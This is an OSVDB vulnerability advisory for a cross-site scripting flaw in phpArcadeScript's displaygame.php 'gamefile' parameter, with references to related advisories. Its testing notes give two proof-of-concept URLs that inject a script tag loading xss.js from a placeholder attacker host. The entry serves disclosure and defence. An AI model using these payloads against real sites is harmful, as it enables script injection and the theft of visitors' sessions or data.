phpArcadeScript displaygame.php gamefile Variable XSS

2006-03-04T10:17:38
ID OSVDB:23674
Type osvdb
Reporter OSVDB
Modified 2006-03-04T10:17:38

Description

Manual Testing Notes

http://[target]/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://[attacker]/xss.js%3E%3C/SCRIPT%3E

http://[target]/includes/displaygame.php?filetype=2&gamefile=%22%3E%3CSCRIPT%20SRC=http://[attacker]/xss.js%3E%3C/SCRIPT%3E

References:

Vendor URL: http://www.phparcadescript.com/
Secunia Advisory ID: 19124
Related OSVDB ID: 23670
Related OSVDB ID: 23671
Related OSVDB ID: 23672
Related OSVDB ID: 23673
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0630.html